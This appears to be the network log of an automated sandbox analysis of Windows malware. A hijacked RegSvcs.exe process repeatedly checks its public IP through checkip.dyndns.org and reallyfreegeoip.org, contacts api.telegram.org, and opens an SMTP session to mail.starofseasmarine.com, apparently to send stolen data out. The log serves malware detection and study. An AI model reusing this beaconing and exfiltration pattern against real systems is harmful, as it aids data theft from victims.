                                                                                                                                      Nov 6, 2024 12:45:20.712214947 CET44349756188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:20.867326021 CET44349756188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:20.867404938 CET44349756188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:20.867465973 CET49756443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:20.868344069 CET49756443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:20.872302055 CET4974580192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:20.873656034 CET4976280192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:20.877389908 CET8049745158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:20.877446890 CET4974580192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:20.878437042 CET8049762158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:20.878504992 CET4976280192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:20.878617048 CET4976280192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:20.883368015 CET8049762158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:21.519088030 CET8049762158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:21.520565033 CET49767443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:21.520595074 CET44349767188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:21.520663977 CET49767443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:21.520895004 CET49767443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:21.520905972 CET44349767188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:21.560125113 CET4976280192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:22.137257099 CET44349767188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:22.139014006 CET49767443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:22.139035940 CET44349767188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:22.283596992 CET44349767188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:22.283678055 CET44349767188.114.97.3192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:22.283720016 CET49767443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:22.284179926 CET49767443192.168.2.5188.114.97.3
                                                                                                                                      Nov 6, 2024 12:45:22.298660994 CET4976280192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:22.304141045 CET8049762158.101.44.242192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:22.304202080 CET4976280192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:22.306127071 CET49771443192.168.2.5149.154.167.220
                                                                                                                                      Nov 6, 2024 12:45:22.306149960 CET44349771149.154.167.220192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:22.306197882 CET49771443192.168.2.5149.154.167.220
                                                                                                                                      Nov 6, 2024 12:45:22.306539059 CET49771443192.168.2.5149.154.167.220
                                                                                                                                      Nov 6, 2024 12:45:22.306552887 CET44349771149.154.167.220192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:23.141195059 CET44349771149.154.167.220192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:23.141309023 CET49771443192.168.2.5149.154.167.220
                                                                                                                                      Nov 6, 2024 12:45:23.142985106 CET49771443192.168.2.5149.154.167.220
                                                                                                                                      Nov 6, 2024 12:45:23.142998934 CET44349771149.154.167.220192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:23.143201113 CET44349771149.154.167.220192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:23.144718885 CET49771443192.168.2.5149.154.167.220
                                                                                                                                      Nov 6, 2024 12:45:23.187339067 CET44349771149.154.167.220192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:23.380445957 CET44349771149.154.167.220192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:23.380495071 CET44349771149.154.167.220192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:23.380645037 CET49771443192.168.2.5149.154.167.220
                                                                                                                                      Nov 6, 2024 12:45:23.387996912 CET49771443192.168.2.5149.154.167.220
                                                                                                                                      Nov 6, 2024 12:45:28.590015888 CET4970780192.168.2.5158.101.44.242
                                                                                                                                      Nov 6, 2024 12:45:28.762051105 CET49807587192.168.2.5166.62.28.135
                                                                                                                                      Nov 6, 2024 12:45:28.766937971 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:28.767016888 CET49807587192.168.2.5166.62.28.135
                                                                                                                                      Nov 6, 2024 12:45:29.858689070 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:29.859013081 CET49807587192.168.2.5166.62.28.135
                                                                                                                                      Nov 6, 2024 12:45:29.863943100 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:30.198474884 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:30.198743105 CET49807587192.168.2.5166.62.28.135
                                                                                                                                      Nov 6, 2024 12:45:30.203618050 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:30.540788889 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:30.541347980 CET49807587192.168.2.5166.62.28.135
                                                                                                                                      Nov 6, 2024 12:45:30.546178102 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:30.884095907 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:30.884126902 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:30.884136915 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:30.884171009 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:30.884181976 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:30.884278059 CET49807587192.168.2.5166.62.28.135
                                                                                                                                      Nov 6, 2024 12:45:30.885168076 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:30.885183096 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:30.885237932 CET49807587192.168.2.5166.62.28.135
                                                                                                                                      Nov 6, 2024 12:45:30.894326925 CET49807587192.168.2.5166.62.28.135
                                                                                                                                      Nov 6, 2024 12:45:30.899158955 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:31.229572058 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:31.234335899 CET49807587192.168.2.5166.62.28.135
                                                                                                                                      Nov 6, 2024 12:45:31.239276886 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:31.569521904 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:31.570964098 CET49807587192.168.2.5166.62.28.135
                                                                                                                                      Nov 6, 2024 12:45:31.575875998 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:31.906351089 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:31.906718016 CET49807587192.168.2.5166.62.28.135
                                                                                                                                      Nov 6, 2024 12:45:31.912223101 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:33.577788115 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:33.578016043 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:33.578067064 CET49807587192.168.2.5166.62.28.135
                                                                                                                                      Nov 6, 2024 12:45:33.578180075 CET49807587192.168.2.5166.62.28.135
                                                                                                                                      Nov 6, 2024 12:45:33.586077929 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:33.918817043 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:33.919035912 CET49807587192.168.2.5166.62.28.135
                                                                                                                                      Nov 6, 2024 12:45:33.923923969 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:34.313334942 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:34.313574076 CET49807587192.168.2.5166.62.28.135
                                                                                                                                      Nov 6, 2024 12:45:34.318449020 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:34.648833036 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:34.649615049 CET49807587192.168.2.5166.62.28.135
                                                                                                                                      Nov 6, 2024 12:45:34.649673939 CET49807587192.168.2.5166.62.28.135
                                                                                                                                      Nov 6, 2024 12:45:34.649692059 CET49807587192.168.2.5166.62.28.135
                                                                                                                                      Nov 6, 2024 12:45:34.649719000 CET49807587192.168.2.5166.62.28.135
                                                                                                                                      Nov 6, 2024 12:45:34.654473066 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:34.654531956 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:34.654596090 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:34.654606104 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:48.479382038 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:48.528841019 CET49807587192.168.2.5166.62.28.135
                                                                                                                                      Nov 6, 2024 12:45:48.745578051 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:48.745676041 CET49807587192.168.2.5166.62.28.135
                                                                                                                                      Nov 6, 2024 12:47:08.779227018 CET49807587192.168.2.5166.62.28.135
                                                                                                                                      Nov 6, 2024 12:47:08.784221888 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:47:09.114877939 CET58749807166.62.28.135192.168.2.5
                                                                                                                                      Nov 6, 2024 12:47:09.118680954 CET49807587192.168.2.5166.62.28.135
                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Nov 6, 2024 12:44:55.942614079 CET5419753192.168.2.51.1.1.1
                                                                                                                                      Nov 6, 2024 12:44:55.950109005 CET53541971.1.1.1192.168.2.5
                                                                                                                                      Nov 6, 2024 12:44:56.798918009 CET5938453192.168.2.51.1.1.1
                                                                                                                                      Nov 6, 2024 12:44:56.806133032 CET53593841.1.1.1192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:22.298574924 CET5015053192.168.2.51.1.1.1
                                                                                                                                      Nov 6, 2024 12:45:22.305604935 CET53501501.1.1.1192.168.2.5
                                                                                                                                      Nov 6, 2024 12:45:28.749017954 CET5884753192.168.2.51.1.1.1
                                                                                                                                      Nov 6, 2024 12:45:28.761444092 CET53588471.1.1.1192.168.2.5
                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                      Nov 6, 2024 12:44:55.942614079 CET192.168.2.51.1.1.10x309eStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                      Nov 6, 2024 12:44:56.798918009 CET192.168.2.51.1.1.10x540aStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                      Nov 6, 2024 12:45:22.298574924 CET192.168.2.51.1.1.10x1775Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                      Nov 6, 2024 12:45:28.749017954 CET192.168.2.51.1.1.10xd36Standard query (0)mail.starofseasmarine.comA (IP address)IN (0x0001)false
                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                      Nov 6, 2024 12:44:55.950109005 CET1.1.1.1192.168.2.50x309eNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      Nov 6, 2024 12:44:55.950109005 CET1.1.1.1192.168.2.50x309eNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                      Nov 6, 2024 12:44:55.950109005 CET1.1.1.1192.168.2.50x309eNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                      Nov 6, 2024 12:44:55.950109005 CET1.1.1.1192.168.2.50x309eNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                      Nov 6, 2024 12:44:55.950109005 CET1.1.1.1192.168.2.50x309eNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                      Nov 6, 2024 12:44:55.950109005 CET1.1.1.1192.168.2.50x309eNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                      Nov 6, 2024 12:44:56.806133032 CET1.1.1.1192.168.2.50x540aNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                      Nov 6, 2024 12:44:56.806133032 CET1.1.1.1192.168.2.50x540aNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                      Nov 6, 2024 12:45:22.305604935 CET1.1.1.1192.168.2.50x1775No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                      Nov 6, 2024 12:45:28.761444092 CET1.1.1.1192.168.2.50xd36No error (0)mail.starofseasmarine.com166.62.28.135A (IP address)IN (0x0001)false
                                                                                                                                      • reallyfreegeoip.org
                                                                                                                                      • api.telegram.org
                                                                                                                                      • checkip.dyndns.org
                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      0192.168.2.549704158.101.44.242803688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Nov 6, 2024 12:44:55.961886883 CET151OUTGET / HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Nov 6, 2024 12:44:56.600788116 CET323INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 06 Nov 2024 11:44:56 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Content-Length: 106
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Request-ID: 23073943a4e3f54831ab5f4c2434fbce
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>
                                                                                                                                      Nov 6, 2024 12:44:56.606398106 CET127OUTGET / HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                      Nov 6, 2024 12:44:56.752413988 CET323INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 06 Nov 2024 11:44:56 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Content-Length: 106
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Request-ID: b5fad6848f00aa86318d5c590c07ffb5
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>
                                                                                                                                      Nov 6, 2024 12:44:57.645746946 CET127OUTGET / HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                      Nov 6, 2024 12:44:57.795483112 CET323INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 06 Nov 2024 11:44:57 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Content-Length: 106
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Request-ID: 651b3c1ed012b8d27f20c43eef23a69e
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      1192.168.2.549707158.101.44.242803688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Nov 6, 2024 12:44:58.578682899 CET127OUTGET / HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                      Nov 6, 2024 12:44:59.438713074 CET323INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 06 Nov 2024 11:44:59 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Content-Length: 106
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Request-ID: 7e12f2e78dfdf054561083e7220130f0
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      2192.168.2.549709158.101.44.242803688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Nov 6, 2024 12:45:00.204039097 CET151OUTGET / HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Nov 6, 2024 12:45:02.887505054 CET323INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 06 Nov 2024 11:45:02 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Content-Length: 106
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Request-ID: 4867576486089a4f0f7a21b7c404d977
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      3192.168.2.549711158.101.44.242803688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Nov 6, 2024 12:45:03.899218082 CET151OUTGET / HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Nov 6, 2024 12:45:10.534910917 CET323INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 06 Nov 2024 11:45:10 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Content-Length: 106
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Request-ID: 22c05e00829dcc0e878ef7d513479cb5
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      4192.168.2.549716158.101.44.242803688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Nov 6, 2024 12:45:11.302491903 CET151OUTGET / HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Nov 6, 2024 12:45:15.554363012 CET323INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 06 Nov 2024 11:45:15 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Content-Length: 106
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Request-ID: 94b813f6e57d37b259f478f7c3531cae
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      5192.168.2.549733158.101.44.242803688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Nov 6, 2024 12:45:16.322596073 CET151OUTGET / HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Nov 6, 2024 12:45:17.645628929 CET323INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 06 Nov 2024 11:45:17 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Content-Length: 106
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Request-ID: ba51a48fd026ae3b9e5867527ba6c22e
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      6192.168.2.549745158.101.44.242803688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Nov 6, 2024 12:45:18.413702965 CET151OUTGET / HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Nov 6, 2024 12:45:20.061755896 CET323INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 06 Nov 2024 11:45:19 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Content-Length: 106
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Request-ID: b9d8a19fb47553415d0aa33914cd0d49
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      7192.168.2.549762158.101.44.242803688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Nov 6, 2024 12:45:20.878617048 CET151OUTGET / HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Nov 6, 2024 12:45:21.519088030 CET323INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 06 Nov 2024 11:45:21 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Content-Length: 106
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Request-ID: 84cd4dde718e27dcba76f8005b446459
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
